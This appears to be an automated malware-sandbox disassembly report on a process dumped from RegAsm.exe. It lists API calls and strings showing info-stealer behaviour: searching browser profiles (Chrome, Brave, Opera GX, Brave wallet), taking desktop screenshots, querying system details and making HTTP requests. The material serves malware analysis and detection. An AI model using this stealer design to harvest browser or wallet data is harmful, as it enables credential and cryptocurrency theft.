Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,00417542,004366F5), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,00417013,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 004105BD

Part of subcall function 00412166: CreateFileA.KERNEL32(00414F04,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,00414F04,?), ref: 00412181

_memset.LIBCMT ref: 00414D80
lstrcatA.KERNEL32(?,?), ref: 00414D95
strtok_s.MSVCRT ref: 00414DDA
_memset.LIBCMT ref: 00414DEC
lstrcatA.KERNEL32(?,?), ref: 00414E01
strtok_s.MSVCRT ref: 00414E1A
PathMatchSpecA.SHLWAPI(?,00000000), ref: 00414E2F
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00414F0E
strtok_s.MSVCRT ref: 00414F3F
FindNextFileA.KERNELBASE(?,?), ref: 0041505D
FindClose.KERNEL32(?), ref: 0041507D

Strings

%s\%s, xrefs: 00414D68
%s\%s, xrefs: 00414D14
%s\%s\%s, xrefs: 00414D51
%s\*.*, xrefs: 00414C68

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _memsetlstrcatwsprintf$FileFindlstrcpystrtok_s$CloseCreateFirstMatchNextPathSpecUnothrow_t@std@@@__ehfuncinfo$??2@lstrlen
String ID: %s\%s$%s\%s$%s\%s\%s$%s\*.*
API String ID: 2867719434-332874205
Opcode ID: c7c54ee5e9fe4d6a72b1153dcb02f015ae8fde7c7b47d09ac18c70222b11fb94
Instruction ID: 6f7b93a854d5a0e86301a0c6b8981a169f2daa0c282da15ace9a6ba5f662f6a4
Opcode Fuzzy Hash: c7c54ee5e9fe4d6a72b1153dcb02f015ae8fde7c7b47d09ac18c70222b11fb94
Instruction Fuzzy Hash: B1C14CB2E0021AABCF21EF61DC45AEE777DAF48305F0140A6FA09B2191D7789F858F55

Function 0040884C Relevance: 42.4, APIs: 23, Strings: 1, Instructions: 405
memoryfilestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00410795: StrCmpCA.SHLWAPI(?,?,?,00408863,?,?,?), ref: 0041079E

CopyFileA.KERNEL32(?,?,00000001,004371B8,004367CB,?,?,?), ref: 00408941

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,0041757A), ref: 00410538

Part of subcall function 004122B0: _memset.LIBCMT ref: 004122D7
Part of subcall function 004122B0: OpenProcess.KERNEL32(00001001,00000000,?,00000000,?), ref: 0041237D
Part of subcall function 004122B0: TerminateProcess.KERNEL32(00000000,00000000), ref: 0041238B
Part of subcall function 004122B0: CloseHandle.KERNEL32(00000000), ref: 00412392

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00416FF5,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00416FF5,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00416FF5,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,00417013,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 004105BD

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,00417542,004366F5), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00408AA6
RtlAllocateHeap.NTDLL(00000000), ref: 00408AAD
StrCmpCA.SHLWAPI(?,ERROR_RUN_EXTRACTOR), ref: 00408B95
StrCmpCA.SHLWAPI(?,004371DC), ref: 00408BAB
StrCmpCA.SHLWAPI(?,004371E0), ref: 00408BD3
lstrlenA.KERNEL32(?), ref: 00408CF0
lstrlenA.KERNEL32(?), ref: 00408D0B

Part of subcall function 00416DF0: CreateThread.KERNEL32(00000000,00000000,00416D1F,?,00000000,00000000), ref: 00416E8F
Part of subcall function 00416DF0: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416E97

DeleteFileA.KERNEL32(?), ref: 00408D4E

Strings

ERROR_RUN_EXTRACTOR, xrefs: 00408B8F

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$Processlstrlen$FileHeaplstrcat$AllocateCloseCopyCreateDeleteHandleObjectOpenSingleTerminateThreadWait_memset
String ID: ERROR_RUN_EXTRACTOR
API String ID: 2819533921-2709115261
Opcode ID: ba9b13c037647cd41f3079d84187041fbfb60d84fbb1ed338427ee2047a0e5a2
Instruction ID: ac8de070c76720368675634539861ab28eb5db258c044a035d3f4774010a148c
Opcode Fuzzy Hash: ba9b13c037647cd41f3079d84187041fbfb60d84fbb1ed338427ee2047a0e5a2
Instruction Fuzzy Hash: 3BE14E72A00209AFCF11FFA1ED4A9DD7B76AF04309F10502AF541B71E1DBB86D858B99

Function 00409D1C Relevance: 40.9, APIs: 18, Strings: 5, Instructions: 610
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00416FD4,004366CB,?,?,?,?,004184E8), ref: 0041050D

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,00417542,004366F5), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00416FF5,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00416FF5,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00416FF5,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,00417013,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 004105BD

FindFirstFileA.KERNEL32(?,?,004367EF,004367EE,00437318,004367ED,?,?,?), ref: 00409DC6
StrCmpCA.SHLWAPI(?,0043731C), ref: 00409DE7
StrCmpCA.SHLWAPI(?,00437320), ref: 00409E01

Part of subcall function 00410549: lstrlenA.KERNEL32(?,?,004170CD,004366CF,004366CE,?,?,?,?,004184E8), ref: 0041054F
Part of subcall function 00410549: lstrcpyA.KERNEL32(00000000,00000000,?,004170CD,004366CF,004366CE,?,?,?,?,004184E8), ref: 00410581

StrCmpCA.SHLWAPI(?,Opera GX,00437324,?,004367F6), ref: 00409E93
StrCmpCA.SHLWAPI(?,Brave,00437344,00437348,00437324,?,004367F6), ref: 0040A015
StrCmpCA.SHLWAPI(?,Preferences), ref: 0040A02F
StrCmpCA.SHLWAPI(?), ref: 0040A1FC
StrCmpCA.SHLWAPI(?), ref: 0040A266
StrCmpCA.SHLWAPI(0040CCE9), ref: 0040A279

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,0041757A), ref: 00410538

StrCmpCA.SHLWAPI(?), ref: 0040A35C
CopyFileA.KERNEL32(?,?,00000001,00437380,004367FB), ref: 0040A41C
StrCmpCA.SHLWAPI(?,Google Chrome), ref: 0040A4C1
DeleteFileA.KERNEL32(?), ref: 0040A522

Part of subcall function 00408DDB: lstrlenA.KERNEL32(?), ref: 00408FD4
Part of subcall function 00408DDB: lstrlenA.KERNEL32(?), ref: 00408FEF

Part of subcall function 00409549: lstrlenA.KERNEL32(?), ref: 00409970
Part of subcall function 00409549: lstrlenA.KERNEL32(?), ref: 0040998B

StrCmpCA.SHLWAPI(?), ref: 0040A553
CopyFileA.KERNEL32(?,?,00000001,00437394,00436802), ref: 0040A613
DeleteFileA.KERNEL32(?), ref: 0040A6AA

Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,004366FB,?), ref: 00411C79

FindNextFileA.KERNEL32(?,?), ref: 0040A76E
FindClose.KERNEL32(?), ref: 0040A782

Strings

Preferences, xrefs: 0040A023
Opera GX, xrefs: 00409E8B
\BraveWallet\Preferences, xrefs: 0040A105
Brave, xrefs: 0040A00D
Google Chrome, xrefs: 0040A4B9

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Filelstrcpylstrlen$Find$CopyDeletelstrcat$CloseFirstNextSystemTime
String ID: Brave$Google Chrome$Opera GX$Preferences$\BraveWallet\Preferences
API String ID: 3650549319-1189830961
Opcode ID: 026c43d676eb6b18c2fd99d793642a2c65a51e07d35f54929d61d82c5defca88
Instruction ID: e51ad2bee311a46610e9726e3f25293ae7740cee9918234d5344f96c4803678a
Opcode Fuzzy Hash: 026c43d676eb6b18c2fd99d793642a2c65a51e07d35f54929d61d82c5defca88
Instruction Fuzzy Hash: 5F421C719401299BCF21FB65DD46BCD7775AF04308F4101AAB848B31A2DB78AED98F89

Function 00415F2A Relevance: 33.5, APIs: 16, Strings: 3, Instructions: 205stringfileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 00415F71
FindFirstFileA.KERNEL32(?,?), ref: 00415F88
StrCmpCA.SHLWAPI(?,00436AA8), ref: 00415FA9
StrCmpCA.SHLWAPI(?,00436AAC), ref: 00415FC3
wsprintfA.USER32 ref: 00415FEA
StrCmpCA.SHLWAPI(?,00436647), ref: 00415FFE
wsprintfA.USER32 ref: 0041601B
wsprintfA.USER32 ref: 00416032
PathMatchSpecA.SHLWAPI(?,?), ref: 00416048
lstrcatA.KERNEL32(?), ref: 0041607E
lstrcatA.KERNEL32(?,00436AC4), ref: 00416090
lstrcatA.KERNEL32(?,?), ref: 004160A3
lstrcatA.KERNEL32(?,00436AC8), ref: 004160B5
lstrcatA.KERNEL32(?,?), ref: 004160C9
FindNextFileA.KERNEL32(?,?), ref: 00416258
FindClose.KERNEL32(?), ref: 0041626C

Strings

%s\*, xrefs: 00415F65
%s\%s, xrefs: 00415FE4
%s\%s, xrefs: 0041602C

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$wsprintf$Find$File$CloseFirstMatchNextPathSpec
String ID: %s\%s$%s\%s$%s\*
API String ID: 3541214880-445461498
Opcode ID: 90f7cf219c711819c962df46abc1a792a3fe818279b43419897b36da4a22459c
Instruction ID: bb7c617b5356a8f7f9baaf58350c8af25fd1393fbdd99b77f2657e55e09c80c3
Opcode Fuzzy Hash: 90f7cf219c711819c962df46abc1a792a3fe818279b43419897b36da4a22459c
Instruction Fuzzy Hash: 79814A7190022DABCF20EB65DC45ACD77B9BF08305F0190E6E549B3190DF79AAC98F85

Function 00411807 Relevance: 33.4, APIs: 11, Strings: 8, Instructions: 143memorycomtimeCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 0041180E
CoInitializeEx.OLE32(00000000,00000000,0000004C,00413E51,Install Date: ,004368A4,00000000,Windows: ,00436894,Work Dir: In memory,0043687C), ref: 0041181F
CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00411830
CoCreateInstance.OLE32(00432F00,00000000,00000001,00432E30,?), ref: 0041184A
CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00411880
VariantInit.OLEAUT32(?), ref: 004118DB

Part of subcall function 00411757: __EH_prolog3_catch.LIBCMT ref: 0041175E
Part of subcall function 00411757: CoCreateInstance.OLE32(004331B0,00000000,00000001,0043AF54,?,00000018,00411901,?), ref: 00411781
Part of subcall function 00411757: SysAllocString.OLEAUT32(?), ref: 0041178E
Part of subcall function 00411757: _wtoi64.MSVCRT ref: 004117C1
Part of subcall function 00411757: SysFreeString.OLEAUT32(?), ref: 004117DA
Part of subcall function 00411757: SysFreeString.OLEAUT32(00000000), ref: 004117E1

FileTimeToSystemTime.KERNEL32(?,?), ref: 0041190A
GetProcessHeap.KERNEL32(00000000,00000104), ref: 00411916
HeapAlloc.KERNEL32(00000000), ref: 0041191D
VariantClear.OLEAUT32(?), ref: 0041195C
wsprintfA.USER32 ref: 00411949

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00416FD4,004366CB,?,?,?,?,004184E8), ref: 0041050D

Strings

Unknown, xrefs: 00411971
Unknown, xrefs: 0041196A
WQL, xrefs: 0041189A
ROOT\CIMV2, xrefs: 00411862
%d/%d/%d %d:%d:%d, xrefs: 00411943
InstallDate, xrefs: 004118ED
Select * From Win32_OperatingSystem, xrefs: 00411895
Unknown, xrefs: 00411985

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: String$AllocCreateFreeHeapInitializeInstanceTimeVariant$BlanketClearFileH_prolog3_catchH_prolog3_catch_InitProcessProxySecuritySystem_wtoi64lstrcpywsprintf
String ID: %d/%d/%d %d:%d:%d$InstallDate$ROOT\CIMV2$Select * From Win32_OperatingSystem$Unknown$Unknown$Unknown$WQL
API String ID: 2280294774-461178377
Opcode ID: d74849c2f535e7524fbce2af1c08969012029ed044de520f0ab02d610e8d1f48
Instruction ID: d244554c86fe21738c26bdb69d4d8efd6a0f985d4811909641b41ba4cfe6dbdf
Opcode Fuzzy Hash: d74849c2f535e7524fbce2af1c08969012029ed044de520f0ab02d610e8d1f48
Instruction Fuzzy Hash: 65414DB1940209BBCB20DBD5DC89EEFBBBDEFC9B11F20411AF611A6190D6789941CB24

Function 00411F55 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 147windowCOMMON

Download Yara Rule

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00411F96
GetDesktopWindow.USER32 ref: 00411FA4
GetWindowRect.USER32(00000000,?), ref: 00411FB1
GetDC.USER32(00000000), ref: 00411FB8
CreateCompatibleDC.GDI32(00000000), ref: 00411FC1
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00411FD1
SelectObject.GDI32(?,00000000), ref: 00411FDE
BitBlt.GDI32(?,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 00411FFA
GetHGlobalFromStream.COMBASE(?,?), ref: 00412049
GlobalLock.KERNEL32(?), ref: 00412052
GlobalSize.KERNEL32(?), ref: 0041205E

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00416FD4,004366CB,?,?,?,?,004184E8), ref: 0041050D

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,0041757A), ref: 00410538

Part of subcall function 00405482: lstrlenA.KERNEL32(?), ref: 00405519
Part of subcall function 00405482: StrCmpCA.SHLWAPI(?,00436986,0043697F,0043697E,0043697B), ref: 00405588
Part of subcall function 00405482: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004055AA

SelectObject.GDI32(?,?), ref: 004120BC
DeleteObject.GDI32(?), ref: 004120D7
DeleteObject.GDI32(?), ref: 004120E0
ReleaseDC.USER32(00000000,00000000), ref: 004120E8
CloseWindow.USER32(00000000), ref: 004120EF

Strings

zA, xrefs: 004120FD

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: GlobalObject$CreateWindow$CompatibleDeleteSelectStreamlstrcpy$BitmapCloseDesktopFromInternetLockOpenRectReleaseSizelstrlen
String ID: zA
API String ID: 2610876673-319258504
Opcode ID: b5168be86a39c5b1e42084697175c7d776ae24631e6971c54498df8cfc08464d
Instruction ID: 593c08adb4f7cdf4d128a34c72cef7012c99529c00b9e1be48a2795b2aa79f85
Opcode Fuzzy Hash: b5168be86a39c5b1e42084697175c7d776ae24631e6971c54498df8cfc08464d
Instruction Fuzzy Hash: 7251E772800208AFDF11EFA1ED498EEBF7AFF48315F005129F902E21A0DB759955DBA1

Function 0041C3CB Relevance: 26.7, APIs: 13, Strings: 2, Instructions: 440COMMON

Download Yara Rule

Strings

/, xrefs: 0041C47E
UT, xrefs: 0041C6F6

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: /$UT
API String ID: 0-1626504983
Opcode ID: 4b8543169a6b603c614606aac28ca5986573f8b07da4dca56c8add6b70928c34
Instruction ID: 81b47b01b300f434a8c3ae57adc03bcbbb395b8cbc70cd73b8126f28a87e5c9a
Opcode Fuzzy Hash: 4b8543169a6b603c614606aac28ca5986573f8b07da4dca56c8add6b70928c34
Instruction Fuzzy Hash: 04027EB19442698BDF21DF68CC807EEBBB5AF45304F0440EAD949A7242D7389EC5CF99

Function 00406963 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 161networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,0041757A), ref: 00410538

Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00416FD4,004366CB,?,?,?,?,004184E8), ref: 0041050D

InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004069C5
StrCmpCA.SHLWAPI(?), ref: 004069DF
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406A0E
HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00406A4D
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406A7D
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406A88
HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00406AAC
InternetReadFile.WININET(?,?,000007CF,?), ref: 00406B40
InternetCloseHandle.WININET(?), ref: 00406B50
InternetCloseHandle.WININET(?), ref: 00406B5C
InternetCloseHandle.WININET(?), ref: 00406B68

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00416FF5,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00416FF5,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00416FF5,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,00417013,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 004105BD

Strings

ERROR, xrefs: 00406BAB
ERROR, xrefs: 00406AB6
WhA, xrefs: 00406976
GET, xrefs: 00406A42

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpy$CloseHandleHttp$OpenRequestlstrlen$ConnectCrackFileInfoOptionQueryReadSendlstrcat
String ID: ERROR$ERROR$GET$WhA
API String ID: 3863758870-334971521
Opcode ID: 816a36f555a8b8381fb4d3f3131cdd84461438fa2ed797a76106280d71036ed1
Instruction ID: 1140700a97ba70663e2ddff7aaed975059cc29de45b703f1e060ed655fff7f66
Opcode Fuzzy Hash: 816a36f555a8b8381fb4d3f3131cdd84461438fa2ed797a76106280d71036ed1
Instruction Fuzzy Hash: 13518CB2A00169AFDF20EB60DC85AEEB7B9FB04344F0181B6F549B6190CA745E859F94

Function 0041509A Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 146stringCOMMON

Download Yara Rule

APIs

GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 0041511A
_memset.LIBCMT ref: 0041513D
GetDriveTypeA.KERNEL32(?), ref: 00415146
lstrcpyA.KERNEL32(?,?), ref: 00415166
lstrcpyA.KERNEL32(?,?), ref: 00415181

